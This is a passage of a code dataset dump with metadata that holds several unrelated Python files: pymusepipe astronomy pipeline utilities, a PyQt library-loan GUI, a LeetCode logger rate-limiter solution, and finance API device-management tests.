logger.debug('Ran the following job locally: %s', jobID)","sub_path":"pycfiles/toil-4.1.0-py3.6/toilDebugJob.cpython-36.py","file_name":"toilDebugJob.cpython-36.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"547386128","text":"# Licensed under a MIT license - see LICENSE\n\n\"\"\"MUSE-PHANGS utility functions for pymusepipe\n\"\"\"\n\n__authors__ = \"Eric Emsellem\"\n__copyright__ = \"(c) 2017, ESO + CRAL\"\n__license__ = \"MIT License\"\n__contact__ = \" \"\n\n# Importing modules\nimport os\nimport time\nfrom os.path import join as joinpath\nimport copy\n\n# Numpy\nimport numpy as np\n\nfrom astropy import constants as const\nfrom astropy.io import fits as pyfits\n\n# Import package modules\nfrom .emission_lines import list_emission_lines\nfrom .emission_lines import full_muse_wavelength_range\nfrom .config_pipe import default_filter_list\nfrom . import util_pipe as upipe\n\nfrom mpdaf.obj import Image, Cube\n\nfrom collections import OrderedDict\n\n############ PRINTING FUNCTIONS #########################\nHEADER = '\\033[95m'\nOKBLUE = '\\033[94m'\nOKGREEN = '\\033[92m'\nWARNING = '\\033[0;31;20m'\nINFO = '\\033[0;32;20m'\nERROR = '\\033[1;91m'\nENDC = '\\033[0m'\nBOLD = '\\033[1m'\nDEBUG = '\\033[1m'\n\ndef print_endline(text, **kwargs):\n print(INFO + text + ENDC, **kwargs)\n\ndef print_warning(text, **kwargs):\n toprint = \"# MusePipeWarning \" + text\n mypipe = kwargs.pop(\"pipe\", None)\n try:\n mypipe.write_logfile(toprint)\n except:\n pass\n try:\n verbose = mypipe.verbose\n except:\n verbose = kwargs.pop(\"verbose\", True)\n \n if verbose:\n print(WARNING + \"# MusePipeWarning \" + ENDC + text, **kwargs)\n\ndef print_info(text, **kwargs):\n \"\"\"Print processing information\n\n Input\n -----\n text: str\n pipe: musepipe [None]\n If provided, will print the text in the logfile\n \"\"\"\n toprint = \"# MusePipeInfo \" + text\n mypipe = kwargs.pop(\"pipe\", None)\n try:\n mypipe.write_logfile(toprint)\n except:\n pass\n try:\n verbose = mypipe.verbose\n except:\n verbose = kwargs.pop(\"verbose\", True)\n \n if verbose:\n print(INFO + \"# MusePipeInfo \" + ENDC + text, **kwargs)\n\ndef print_debug(text, **kwargs) :\n \"\"\"Print debugging information\n\n Input\n -----\n text: str\n pipe: musepipe [None]\n If provided, will print the text in the logfile\n \"\"\"\n mypipe = kwargs.pop(\"pipe\", None)\n try:\n verbose = mypipe.verbose\n except:\n verbose = kwargs.pop(\"verbose\", True)\n \n if verbose:\n print(DEBUG + \"# DebugInfo \" + ENDC + text, **kwargs)\n\ndef print_error(text, **kwargs):\n \"\"\"Print error information\n\n Input\n -----\n text: str\n pipe: musepipe [None]\n If provided, will print the text in the logfile\n \"\"\"\n toprint = \"# MusePipeError \" + text\n mypipe = kwargs.pop(\"pipe\", None)\n try:\n mypipe.write_logfile(toprint)\n except:\n pass\n try:\n verbose = mypipe.verbose\n except:\n verbose = kwargs.pop(\"verbose\", True)\n \n if verbose:\n print(ERROR + \"# MusePipeError \" + ENDC + text, **kwargs)\n\n#----------- END PRINTING FUNCTIONS -----------------------\ndef add_string(text, word=\"_\", loc=0):\n \"\"\"Adding string at given location\n Default is underscore for string which are not empty.\n\n Input\n ----\n text (str): input text\n word (str): input word to be added\n loc (int): location in 'text'. [Default is 0=start]\n If None, will be added at the end.\n\n Returns\n ------\n Updated text\n \"\"\"\n if len(text) > 0:\n if loc is None:\n text = f\"{text}{word}\"\n else:\n try:\n if text[loc] != \"_\":\n text = f\"{text[:loc]}{word}{text[loc:]}\"\n\n except:\n print(f\"String index [{loc}] out of range [{len(text)}] in add_string\")\n\n return text\n\ndef lower_rep(text):\n \"\"\"Lower the text and return it after removing all underscores\n\n Args:\n text (str): text to treat\n\n Returns:\n updated text (with removed underscores and lower-cased)\n\n \"\"\"\n return text.replace(\"_\", \"\").lower()\n\ndef lower_allbutfirst_letter(mystring):\n \"\"\"Lowercase all letters except the first one\n \"\"\"\n return mystring[0].upper() + mystring[1:].lower()\n\nclass TimeStampDict(OrderedDict):\n \"\"\"Class which builds a time stamp driven\n dictionary of objects\n \"\"\"\n def __init__(self, description=\"\", myobject=None):\n \"\"\"Initialise an empty dictionary\n with a given name\n \"\"\"\n OrderedDict.__init__(self)\n self.description = description\n self.create_new_timestamp(myobject)\n\n def create_new_timestamp(self, myobject=None):\n \"\"\"Create a new item in dictionary\n using a time stamp\n \"\"\"\n if myobject is not None:\n self.present_tstamp = create_time_name()\n self[self.present_tstamp] = myobject\n else:\n self.present_stamp = None\n\n def delete_timestamp(self, tstamp=None):\n \"\"\"Delete a key in the dictionary\n \"\"\"\n _ = self.pop(tstamp)\n\ndef create_time_name() :\n \"\"\"Create a time-link name for file saving purposes\n\n Return: a string including the YearMonthDay_HourMinSec\n \"\"\"\n return str(time.strftime(\"%Y%m%d_%H%M%S\", time.localtime()))\n\ndef formatted_time() :\n \"\"\" Return: a string including the formatted time\n \"\"\"\n return str(time.strftime(\"%d-%m-%Y %H:%M:%S\", time.localtime()))\n\ndef safely_create_folder(path, verbose=True):\n \"\"\"Create a folder given by the input path\n This small function tries to create it and if it fails\n it checks whether the reason is because it is not a path\n and then warn the user\n and then warn the user\n \"\"\"\n if path is None :\n if verbose : print_info(\"Input path is None, not doing anything\")\n return\n if verbose : \n print_info(\"Trying to create {folder} folder\".format(folder=path), end='')\n try: \n os.makedirs(path)\n if verbose:\n print_endline(\"... Done\", end='\\n')\n except OSError:\n if not os.path.isdir(path):\n print_error(\"Failed to create folder! Please check the path\")\n return\n if os.path.isdir(path):\n if verbose:\n print_endline(\"... Folder already exists, doing nothing.\")\n\ndef append_file(filename, content):\n \"\"\"Append in ascii file\n \"\"\"\n with open(filename, \"a\") as myfile:\n myfile.write(content)\n \ndef abspath(path) :\n \"\"\"Normalise the path to get it short but absolute\n \"\"\"\n return os.path.abspath(os.path.realpath(path))\n\ndef normpath(path) :\n \"\"\"Normalise the path to get it short\n \"\"\"\n return os.path.normpath(os.path.realpath(path))\n\ndef doppler_shift(wavelength, velocity=0.):\n \"\"\"Return the redshifted wavelength\n \"\"\"\n doppler_factor = np.sqrt((1. + velocity / const.c.value) / (1. - velocity / const.c.value))\n return wavelength * doppler_factor\n\ndef get_emissionline_wavelength(line=\"Ha\", velocity=0., redshift=None, medium='air'):\n \"\"\"Get the wavelength of an emission line, including a correction\n for the redshift (or velocity)\n \"\"\"\n index_line = {'vacuum': 0, 'air': 1}\n # Get the velocity\n if redshift is not None : velocity = redshift * const.c\n\n if line is None:\n return -1.\n elif line not in list_emission_lines:\n upipe.print_error(\"Could not guess the emission line you wish to use\")\n upipe.print_error(\"Please review the 'emission_line' dictionary\")\n return -1.\n\n if medium not in index_line:\n upipe.print_error(\"Please choose between one of these media: {0}\".format(index_line.key()))\n return -1.\n\n wavel = list_emission_lines[line][index_line[medium]]\n return doppler_shift(wavel, velocity)\n\ndef get_emissionline_band(line=\"Ha\", velocity=0., redshift=None, medium='air', lambda_window=10.0):\n \"\"\"Get the wavelengths of an emission line, including a correction\n for the redshift (or velocity) and a lambda_window around that line (in Angstroems)\n\n Parameters\n ----------\n line: name of the line (string). Default is 'Ha'\n velocity: shift in velocity (km/s)\n medium: 'air' or 'vacuum'\n lambda_window: lambda_window in Angstroem\n \"\"\"\n red_wavel = get_emissionline_wavelength(line=line, velocity=velocity, redshift=redshift, medium=medium)\n # In case the line is not in the list, just return the full lambda Range\n if red_wavel < 0 :\n return full_muse_wavelength_range\n else:\n return [red_wavel - lambda_window/2., red_wavel + lambda_window/2.]\n\n \ndef select_spaxels(maskDic, maskName, X, Y) :\n \"\"\"Selecting spaxels defined by their coordinates\n using the masks defined by Circle or Rectangle Zones\n \"\"\"\n ## All spaxels are set to GOOD (True) first\n selgood = (X**2 >= 0)\n\n ## If no Mask is provided, we just return the full set of input X, Y\n if maskDic == None :\n return selgood\n\n ## We first check if the maskName is in the list of the defined Masks\n ## If the galaxy is not in the list, then the selection is all True\n if maskName in maskDic:\n ## The mask is defined, so Get the list of Regions\n ## From the defined dictionary\n listRegions = maskDic[maskName]\n ## For each region, select the good spaxels\n for region in listRegions :\n selgood = selgood & region.select(X, Y)\n\n return selgood\n\n\nclass Selection_Zone :\n \"\"\"\n Parent class for Rectangle_Zone and Circle_Zone\n\n Input\n -----\n params: list of floats\n List of parameters for the selection zone\n \"\"\"\n def __init__(self, params=None) :\n self.params = params\n if len(params) != self.nparams:\n print_error(\"Error: {0} Zone needs {1} input parameters - {2} given\".format(\n self.type, self.nparams, len(params)))\n\n\nclass Rectangle_Zone(Selection_Zone) :\n \"\"\"Define a rectangular zone, given by \n a center, a length, a width and an angle\n \"\"\"\n def __init__(self):\n self.type = \"Rectangle\"\n self.nparams = 5\n Selection_Zone.__init__(self)\n\n def select(self, xin, yin) :\n \"\"\" Define a selection within a rectangle\n It can be rotated by an angle theta (in degrees) \n Input\n -----\n xin, yin: 2d arrays\n Input positions for the spaxels\n \"\"\"\n if self.params == None :\n return (xin**2 >=0)\n [x0, y0, length, width, theta] = self.params\n dx = xin - x0\n dy = yin - y0\n thetarad = np.deg2rad(theta)\n nx = dx * np.cos(thetarad) + dy * np.sin(thetarad)\n ny = - dx * np.sin(thetarad) + dy * np.cos(thetarad)\n selgood = (np.abs(ny) > width / 2.) | (np.abs(nx) > length / 2.)\n return selgood\n\nclass Circle_Zone(Selection_Zone) :\n \"\"\"Define a Circular zone, defined by \n a center and a radius\n \"\"\"\n def __init__(self):\n self.type = \"Circle\"\n self.nparams = 5\n Selection_Zone.__init__(self)\n\n def select(self, xin, yin) :\n \"\"\" Define a selection within a circle \n\n Input\n -----\n xin, yin: 2d arrays\n Input positions for the spaxels\n \"\"\"\n if self.params == None :\n return (xin**2 >=0)\n [x0, y0, radius] = self.params\n selgood = (np.sqrt((xin - x0)**2 + (yin - y0)**2) > radius)\n return selgood\n\nclass Trail_Zone(Selection_Zone) :\n \"\"\"Define a Trail zone, defined by\n two points and a width\n \"\"\"\n def __init__(self):\n self.type = \"Trail\"\n self.nparams = 5\n Selection_Zone.__init__(self)\n\n def select(self, xin, yin) :\n \"\"\" Define a selection within trail\n\n Input\n -----\n xin, yin: 2d arrays\n Input positions for the spaxels\n\n \"\"\"\n if self.params == None :\n return (xin**2 >=0)\n [x0, y0, radius] = self.params\n selgood = (np.sqrt((xin - x0)**2 + (yin - y0)**2) > radius)\n return selgood\n\ndef reconstruct_filter_images(cubename, filter_list=default_filter_list,\n filter_fits_file=\"filter_list.fits\"):\n \"\"\" Reconstruct all images in a list of Filters\n cubename: str\n Name of the cube\n filter_list: str\n List of filters, e.g., \"Cousins_R,Johnson_I\"\n By default, the default_filter_list from pymusepipe.config_pipe\n\n filter_fits_file: str\n Name of the fits file containing all the filter characteristics\n Usually in filter_list.fits (MUSE default)\n \"\"\"\n \n command = \"muse_cube_filter -f {0} {1} {2}\".format(\n filter_list, cubename, filter_fits_file)\n os.system(command)\n\ndef add_key_pointing_expo(imaname, iexpo, pointing):\n \"\"\"Add pointing and expo number to image\n\n Input\n -----\n imaname: str\n iexpo: int\n pointing: int\n \"\"\"\n # Writing the pointing and iexpo in the IMAGE_FOV\n this_image = pyfits.open(imaname, mode='update')\n this_image[0].header['MUSEPIPE_POINTING'] = (pointing, \"Pointing number\")\n this_image[0].header['MUSEPIPE_IEXPO'] = (iexpo, \"Exposure number\")\n this_image.flush()\n print_info(\"Keywords MUSEPIPE_POINTING/EXPO updated for image {}\".format(\n imaname))\n\ndef rotate_image_wcs(ima_name, ima_folder=\"\", outwcs_folder=None, rotangle=0.,\n **kwargs):\n \"\"\"Routine to remove potential Nan around an image and reconstruct\n an optimal WCS reference image. The rotation angle is provided as a way\n to optimise the extent of the output image, removing Nan along X and Y\n at that angle.\n\n Args:\n ima_name (str): input image name. No default.\n ima_folder (str): input image folder ['']\n outwcs_folder (str): folder where to write the output frame. Default is\n None which means that it will use the folder of the input image.\n rotangle (float): rotation angle in degrees [0]\n **kwargs:\n in_suffix (str): in suffix to remove from name ['prealign']\n out_suffix (str): out suffix to add to name ['rotwcs']\n margin_factor (float): factor to extend the image [1.1]\n\n Returns:\n\n \"\"\"\n\n # Reading the input names and setting output folder\n fullname = joinpath(ima_folder, ima_name)\n ima_folder, ima_name = os.path.split(fullname)\n if outwcs_folder is None:\n outwcs_folder = ima_folder\n\n # Suffix\n in_suffix = kwargs.pop(\"in_suffix\", \"prealign\")\n out_suffix = kwargs.pop(\"out_suffix\", \"rotwcs\")\n\n # Get margin if needed\n margin_factor = kwargs.pop(\"margin_factor\", 1.1)\n extend_fraction = np.maximum(0., (margin_factor - 1.))\n upipe.print_info(\"Will use a {:5.2f}% extra margin\".format(\n extend_fraction*100.))\n\n # Opening the image via mpdaf\n imawcs = Image(fullname)\n extra_pixels = (np.array(imawcs.shape) * extend_fraction).astype(np.int)\n\n # New dimensions and extend current image\n new_dim = tuple(np.array(imawcs.shape).astype(np.int) + extra_pixels)\n ima_ext = imawcs.regrid(newdim=new_dim, refpos=imawcs.get_start(),\n refpix=tuple(extra_pixels / 2.),\n newinc=imawcs.get_step()[0]*3600.)\n\n # Copy and rotate WCS\n new_wcs = copy.deepcopy(ima_ext.wcs)\n upipe.print_info(\"Rotating WCS by {} degrees\".format(rotangle))\n new_wcs.rotate(rotangle)\n\n # New rotated image\n ima_rot = Image(data=np.nan_to_num(ima_ext.data), wcs=new_wcs)\n\n # Then resample the image using the initial one as your reference\n ima_rot_resampled = ima_rot.align_with_image(ima_ext, flux=True)\n\n # Crop NaN\n ima_rot_resampled.crop()\n\n # get the new header with wcs and rotate back\n finalwcs = ima_rot_resampled.wcs\n finalwcs.rotate(-rotangle)\n\n # create the final image\n final_rot_image = Image(data=ima_rot_resampled.data, wcs=finalwcs)\n\n # Save image\n if isinstance(in_suffix, str) and in_suffix != \"\" and in_suffix in ima_name:\n out_name = ima_name.replace(in_suffix, out_suffix)\n else:\n name, extension = os.path.splitext(ima_name)\n out_suffix = add_string(out_suffix)\n out_name = \"{0}{1}{2}\".format(name, out_suffix, extension)\n\n # write output\n final_rot_image.write(joinpath(outwcs_folder, out_name))\n return outwcs_folder, out_name\n\ndef rotate_cube_wcs(cube_name, cube_folder=\"\", outwcs_folder=None, rotangle=0.,\n **kwargs):\n \"\"\"Routine to remove potential Nan around an image and reconstruct\n an optimal WCS reference image. The rotation angle is provided as a way\n to optimise the extent of the output image, removing Nan along X and Y\n at that angle.\n\n Args:\n cube_name (str): input image name. No default.\n cube_folder (str): input image folder ['']\n outwcs_folder (str): folder where to write the output frame. Default is\n None which means that it will use the folder of the input image.\n rotangle (float): rotation angle in degrees [0]\n **kwargs:\n in_suffix (str): in suffix to remove from name ['prealign']\n out_suffix (str): out suffix to add to name ['rotwcs']\n margin_factor (float): factor to extend the image [1.1]\n\n Returns:\n\n \"\"\"\n\n # Reading the input names and setting output folder\n fullname = joinpath(cube_folder, cube_name)\n cube_folder, cube_name = os.path.split(fullname)\n if outwcs_folder is None:\n outwcs_folder = cube_folder\n\n # Suffix\n in_suffix = kwargs.pop(\"in_suffix\", \"prealign\")\n out_suffix = kwargs.pop(\"out_suffix\", \"rotwcs\")\n\n # Get margin if needed\n margin_factor = kwargs.pop(\"margin_factor\", 1.1)\n extend_fraction = np.maximum(0., (margin_factor - 1.))\n upipe.print_info(\"Will use a {:5.2f}% extra margin\".format(\n extend_fraction*100.))\n\n # Opening the image via mpdaf\n cubewcs = Cube(fullname)\n imawcs = cubewcs.sum(axis=0)\n extra_pixels = (np.array(imawcs.shape) * extend_fraction).astype(np.int)\n\n # New dimensions and extend current image\n new_dim = tuple(np.array(imawcs.shape).astype(np.int) + extra_pixels)\n ima_ext = imawcs.regrid(newdim=new_dim, refpos=imawcs.get_start(),\n refpix=tuple(extra_pixels / 2.),\n newinc=imawcs.get_step()[0]*3600.)\n\n # Copy and rotate WCS\n new_wcs = copy.deepcopy(ima_ext.wcs)\n upipe.print_info(\"Rotating spatial WCS of Cube by {} degrees\".format(rotangle))\n new_wcs.rotate(rotangle)\n\n # New rotated image\n ima_rot = Image(data=np.nan_to_num(ima_ext.data), wcs=new_wcs)\n\n # Then resample the image using the initial one as your reference\n ima_rot_resampled = ima_rot.align_with_image(ima_ext, flux=True)\n\n # Crop NaN\n ima_rot_resampled.crop()\n\n # get the new header with wcs and rotate back\n finalwcs = ima_rot_resampled.wcs\n finalwcs.rotate(-rotangle)\n\n # create the final image\n data_cube_rot = np.repeat(ima_rot_resampled[np.newaxis,:,:].data,\n cubewcs.shape[0], axis=0)\n final_rot_cube = Cube(data=data_cube_rot, wave=cubewcs.wave, wcs=finalwcs)\n\n # Save image\n if isinstance(in_suffix, str) and in_suffix != \"\" and in_suffix in cube_name:\n out_name = cube_name.replace(in_suffix, out_suffix)\n else:\n name, extension = os.path.splitext(cube_name)\n if out_suffix != \"\":\n out_suffix = \"_{}\".format(out_suffix)\n out_name = \"{0}{1}{2}\".format(name, out_suffix, extension)\n\n # write output\n final_rot_cube.write(joinpath(outwcs_folder, out_name))\n return outwcs_folder, out_name\n\ndef filter_list_with_pdict(input_list, list_pointings=None,\n dict_files=None,\n verbose=True):\n \"\"\"Filter out exposures (pixtab or cube namelist) using a dictionary which\n has a list of pointings and for each pointing a list of exposure number.\n\n Args:\n input_list (list of str): input list to filter\n dict_files (dict): dictionary used to filter\n\n Returns:\n selected_list: selected list of files\n\n \"\"\"\n nfiles_input_list = len(input_list)\n if dict_files is None:\n selected_list = input_list\n\n # Otherwise use the ones which are given via their expo numbers\n else:\n selected_list = []\n # this is the list of exposures to consider\n\n if list_pointings is None:\n list_pointings = dict_files.keys()\n elif not isinstance(list_pointings, list):\n upipe.print_error(\"Cannot recognise input pointing(s)\")\n return selected_list\n\n for pointing in list_pointings:\n if pointing not in dict_files:\n upipe.print_warning(\"Pointing {} not in dictionary \"\n \"- skipping\".format(pointing))\n else:\n list_expo = dict_files[pointing]\n # We loop on that list\n for expotuple in list_expo:\n tpl, nexpo = expotuple[0], expotuple[1]\n for expo in nexpo:\n # Check whether this exists in the our cube list\n suffix_expo = \"_{0:04d}\".format(np.int(expo))\n for filename in input_list:\n if (suffix_expo in filename) and (tpl in filename):\n # We select the file\n selected_list.append(filename)\n # And remove it from the list\n input_list.remove(filename)\n # We break out of the cube for loop\n break\n\n if verbose:\n upipe.print_info(\"Pointings {0} - Selected {1}/{2} files after \"\n \"dictionary filtering\".format(list_pointings,\n len(selected_list),\n nfiles_input_list))\n return selected_list\n\ndef filter_list_with_suffix_list(list_names, included_suffix_list=[],\n excluded_suffix_list=[], name_list=\"\"):\n \"\"\"\n\n Args:\n list_names (list of str):\n included_suffix_list (list of str):\n excluded_suffix_list (list of str):\n\n Returns:\n\n \"\"\"\n if name_list is not None:\n add_message = f\"for list {name_list}\"\n else:\n add_message = \"\"\n\n # if the list of inclusion suffix is empty, just use all cubes\n if len(included_suffix_list) > 0:\n upipe.print_info(f\"Using suffixes {included_suffix_list} \"\n f\"as an inclusive condition {add_message}\")\n # Filtering out the ones that don't have any of the suffixes\n temp_list = copy.copy(list_names)\n for l in temp_list:\n if any([suff not in l for suff in included_suffix_list]):\n _ = list_names.remove(l)\n\n # if the list of exclusion suffix is empty, just use all cubes\n if len(excluded_suffix_list) > 0:\n upipe.print_info(f\"Using suffixes {excluded_suffix_list} \"\n f\"as an exclusive condition {add_message}\")\n # Filtering out the ones that have any of the suffixes\n temp_list = copy.copy(list_names)\n for l in temp_list:\n if any([suff in l for suff in excluded_suffix_list]):\n _ = list_names.remove(l)\n\n return list_names\n","sub_path":"src/pymusepipe/util_pipe.py","file_name":"util_pipe.py","file_ext":"py","file_size_in_byte":23301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"388764222","text":"from telaLivro import Ui_TelaLivro\nfrom telaUsuario import Ui_TelaUsuario\nfrom telaEmprestimo import Ui_TelaEmprestimo\nimport telaEmprestimo\nimport telaDevolucao\nimport emprestimo\nfrom emprestimo import Livro, Usuario, Emprestimo\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nimport sys\n\nb = emprestimo.Biblioteca()\n\nclass TelaUsuario(Ui_TelaUsuario):\n\tdef __init__(self, dialog):\n\t\tUi_TelaUsuario.__init__(self)\n\t\tself.setupUi(dialog)\n\n\t\tself.addUser.clicked.connect(self.printName)\n\n\tdef printName(self):\n\t\tuser = User()\n\t\tuser.nome = self.inputNome.text()\n\t\tb.insertUsuario(user)\n\nclass TelaLivro(Ui_TelaLivro):\n\tdef __init__(self, dialog):\n\t\tUi_TelaLivro.__init__(self)\n\t\tself.setupUi(dialog)\n\n\t\tself.addLivro.clicked.connect(self.printName)\n\n\tdef printName(self):\n\t\tlivro = Livro()\n\t\tlivro.nome = self.inputNome.text()\n\t\tb.insertLivro(livro)\n\nclass TelaEmprestimo(Ui_TelaEmprestimo):\n\tdef __init__(self, dialog):\n\t\tUi_TelaEmprestimo.__init__(self)\n\t\tself.setupUi(dialog)\n\n\t\tself.addLivro.clicked.connect(self.adicionaLivro)\n\t\tself.addUser.clicked.connect(self.adicionaUser)\n\t\tself.addEmprestimo.clicked.connect(self.adicionaEmprestimo)\n\t\tself.devolver.clicked.connect(self.devolveLivro)\n\n\tdef adicionaLivro(self):\n\t\tlivro = Livro()\n\t\tlivro.nome = self.novoLivro.text()\n\t\tb.insertLivro(livro)\n\t\tself.novoLivro.setText(\"\")\n\t\tself.comboLivro.clear()\n\t\tfor livro in b.livros:\n\t\t\tself.comboLivro.addItem(str(livro.nome))\n\t\n\tdef adicionaUser(self):\n\t\tuser = Usuario()\n\t\tuser.nome = self.novoUser.text()\n\t\tb.insertUsuario(user)\n\t\tself.novoUser.setText(\"\")\n\t\tself.comboUsuario.clear()\n\t\tfor user in b.usuarios:\n\t\t\tself.comboUsuario.addItem(str(user.nome))\n\n\tdef adicionaEmprestimo(self):\n\t\tlivro = b.localizarLivro(self.comboLivro.currentText())\n\t\tusuario = b.localizarUsuario(self.comboUsuario.currentText())\n\t\tb.emprestar(livro, usuario)\n\t\tself.comboLivro.removeItem(self.comboLivro.currentIndex())\n\t\tself.comboEmprestimo.clear()\n\t\tfor emp in b.emprestimos:\n\t\t\tself.comboEmprestimo.addItem(str(emp.livro.nome) + \" - \" + str(emp.usuario.nome))\n\n\n\tdef devolveLivro(self):\n\t\temp = self.comboEmprestimo.currentText().split(\" - \")\n\t\tlivro = b.localizarLivro(emp[0])\n\t\tusuario = b.localizarUsuario(emp[1])\n\t\temprestimo = b.localizarEmprestimo(livro, usuario)\n\t\tb.devolver(emprestimo)\n\t\tb.emprestimos.remove(emprestimo)\n\t\tself.comboEmprestimo.removeItem(self.comboEmprestimo.currentIndex())\n\t\tself.comboLivro.addItem(str(livro.nome))\n\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n dialog = QtWidgets.QDialog()\n\n prog = TelaEmprestimo(dialog)\n\n dialog.show()\n sys.exit(app.exec_())\n\ndef adicionarLivro():\n\tl = emprestimo.Livro(telaLivro.retornaLabelNome())\n\tb.insertLivro(l)\n\ndef adicionarUsuario():\n\tu = emprestimo.Usuario(telaUsuario.retornarNome())\n\tb.insertUsuario(u)\n\ndef fazerEmprestimo():\n\tl = b.localizarLivro(telaEmprestimo.retornaLabelNome())\n\tu = b.localizarUsuario(telaEmprestimo.retornarNome())\n\tb.emprestimo(l,u)\n\ndef fazerDevolucao():\n\tl = b.localizarLivro(telaDevolucao.retornaLabelNome())\n\tu = b.localizarUsuario(telaDevolucao.retornarNome())\n\te = b.localizarEmprestimo(l,u)\n\tb.devolver(e)","sub_path":"T4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"211052559","text":"\"\"\"\nDesign a logger system that receive stream of messages along with its timestamps, \neach message should be printed if and only if it is not printed in the last 10 seconds.\n\nGiven a message and a timestamp (in seconds granularity), return true if \nthe message should be printed in the given timestamp, otherwise returns false.\n\nIt is possible that several messages arrive roughly at the same time.\n\nExample:\nLogger logger = new Logger();\n\n// logging string \"foo\" at timestamp 1\nlogger.shouldPrintMessage(1, \"foo\"); returns true; \n\n// logging string \"bar\" at timestamp 2\nlogger.shouldPrintMessage(2,\"bar\"); returns true;\n\n// logging string \"foo\" at timestamp 3\nlogger.shouldPrintMessage(3,\"foo\"); returns false;\n\n// logging string \"bar\" at timestamp 8\nlogger.shouldPrintMessage(8,\"bar\"); returns false;\n\n// logging string \"foo\" at timestamp 10\nlogger.shouldPrintMessage(10,\"foo\"); returns false;\n\n// logging string \"foo\" at timestamp 11\nlogger.shouldPrintMessage(11,\"foo\"); returns true;\n\"\"\"\nclass Logger:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.buffer = dict()\n\n def shouldPrintMessage(self, timestamp: int, message: str) -> bool:\n \"\"\"\n Returns true if the message should be printed in the given timestamp, otherwise returns false.\n If this method returns false, the message will not be printed.\n The timestamp is in seconds granularity.\n \"\"\"\n ret = True\n if message not in self.buffer:\n self.buffer[message] = [timestamp]\n else:\n num = -1 \n while True:\n if self.buffer[message][num] > timestamp - 10:\n ret = False\n break\n elif self.buffer[message][num] <= timestamp - 10:\n #self.buffer[message] = self.buffer[message][num:]\n self.buffer[message].append(timestamp)\n break\n num -= 1\n if num < 0:\n break\n return ret","sub_path":"359.LoggerRateLimiter.py","file_name":"359.LoggerRateLimiter.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"2898493","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n@Time :2018-07-16 下午 4:32\n@Author : 罗林\n@File : test_005_Finance_devices.py\n@desc : \n\"\"\"\n\nimport json\nimport time\n\nimport datetime\n\nfrom common.myCommon import Assertion as a\nfrom common.myCommon.TestBaseCase import TestBaseCase\nfrom finance.mysqlQuery import FinanceSql as fs\nfrom finance.mysqlQuery import ManageSql as ms\nfrom finance.testAction import FinanceAction as f\nfrom common.myCommon import TimeFormat as tf\nfrom finance.testSource import Api_Const as c\n\n\norgCode = ms.get_finance_db_id()\n\n\nclass test_005_Finance_devices(TestBaseCase):\n\n # 设备管理\n def test_001_getDeviceType(self):\n # 获取设备类型信息\n r1 = json.loads(f.test_device_getDeviceType())\n a.verity(r1['data'][0]['dictCode'], '1', '断言dictCode')\n a.verity(r1['data'][0]['dictName'], '有线', '断言dictName')\n a.verity(r1['data'][0]['id'], 20, '断言id')\n a.verity(r1['data'][1]['dictCode'], '0', '断言dictCode')\n a.verity(r1['data'][1]['dictName'], '无线', '断言dictName')\n a.verity(r1['data'][1]['id'], 21, '断言id')\n\n def test_002_getDeviceMoudel(self):\n # 获取设备型号信息\n r2 = json.loads(f.test_device_getDeviceMoudel('1'))\n a.verity(r2['data'][0]['dictLevel'], 1, '断言dictLevel')\n a.verity(r2['data'][0]['dictName'], 'GT02D', '断言dictName')\n a.verity(r2['data'][0]['id'], 81, '断言id')\n a.verity(r2['data'][1]['dictLevel'], 1, '断言dictLevel')\n a.verity(r2['data'][1]['dictName'], 'GM02F', '断言dictName')\n a.verity(r2['data'][1]['id'], 85, '断言id')\n a.verity(r2['data'][2]['dictLevel'], 1, '断言dictLevel')\n a.verity(r2['data'][2]['dictName'], 'GM02E', '断言dictName')\n a.verity(r2['data'][2]['id'], 86, '断言id')\n a.verity(r2['data'][3]['dictLevel'], 1, '断言dictLevel')\n a.verity(r2['data'][3]['dictName'], 'GT06N', '断言dictName')\n a.verity(r2['data'][3]['id'], 88, '断言id')\n\n def test_003_getLowerOrg(self):\n # 获取机构信息\n r3 = json.loads(f.test_device_getLowerOrg())\n a.verity(r3['data'][0]['orgCode'], orgCode, '断言orgCode')\n a.verity(r3['data'][0]['name'], c.companyName, '断言组织机构名称')\n\n def test_004_device_save(self):\n # 保存设备记录\n f.test_device_save('', orgCode, c.devicetypecode,\n c.devicemoudelCode, c.deviceCode, '001', tf.getnow_day())\n\n def test_005_device_update(self):\n device_id = fs.get_device_id(c.deviceCode)\n # 更新设备记录\n f.test_device_update(device_id, orgCode, c.devicetypecode,\n c.devicemoudelCode, c.deviceCode, '001', tf.getnow_day())\n\n def test_006_device_list(self):\n # 设备列表\n r4 = json.loads(f.test_device_list(devicecode='', pagesize=10, pagenum=10))\n a.verity(r4['data']['pageNum'], 1, '断言pageNum')\n a.verity(r4['data']['pageSize'], 10, '断言pageSize')\n # a.verityContain(r4['data']['record'], c.deviceCode, '断言修改后的deviceCode')\n\n def test_007_device_detail(self):\n # 获取设备详情\n device_id = fs.get_device_id(c.deviceCode)\n r5 = json.loads(f.test_device_detail(device_id))\n a.verity(r5['data']['deviceCode'], c.deviceCode, '断言deviceCode')\n a.verity(r5['data']['id'], device_id[0][0], '断言device_id')\n a.verity(r5['data']['moudelCode'], c.devicemoudelCode, '断言moudelCode')\n a.verity(r5['data']['orgCode'], orgCode, '断言orgCode')\n a.verity(r5['data']['typeCode'], c.devicetypecode, '断言typeCode')\n\n def test_008_device_delete(self):\n device_id = fs.get_device_id(c.deviceCode)\n # 删除设备记录\n f.test_device_delete(device_id)\n","sub_path":"api-test/finance/test2/test_005_Finance_devices.py","file_name":"test_005_Finance_devices.py","file_ext":"py","file_size_in_byte":3889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"285767242","text":"from django.urls import path\n\nfrom crisis.views.af_crisis_participant_views import \\\n ListCreateAffectedParticipantRequestsAPIV1\nfrom crisis.views.common_views import 